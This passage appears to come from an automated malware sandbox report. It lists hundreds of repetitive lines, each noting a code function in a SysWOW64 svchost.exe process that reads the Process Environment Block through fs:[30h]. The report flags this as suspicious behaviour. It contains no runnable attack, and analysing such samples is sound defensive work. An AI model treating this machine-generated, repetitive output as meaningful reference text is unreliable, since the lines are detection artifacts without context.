            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033280A0 mov eax, dword ptr fs:[00000030h]2_2_033280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]2_2_033BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]2_2_033E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]2_2_033D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]2_2_033BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]2_2_033C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]2_2_0336E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]2_2_03364588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]2_2_033325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]2_2_033365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]2_2_0336A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]2_2_0332C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]2_2_033BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]2_2_033EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]2_2_0332645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]2_2_0335245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]2_2_033644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]2_2_033BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]2_2_033364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]2_2_033EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]2_2_033304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404B00 mov eax, dword ptr fs:[00000030h]2_2_03404B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]2_2_0332CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328B50 mov eax, dword ptr fs:[00000030h]2_2_03328B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]2_2_033DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]2_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]2_2_033D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]2_2_0335EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]2_2_033BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]2_2_033DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]2_2_0336CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]2_2_0336CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]2_2_0335EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]2_2_033BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]2_2_033DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h] 2_2_03336A50
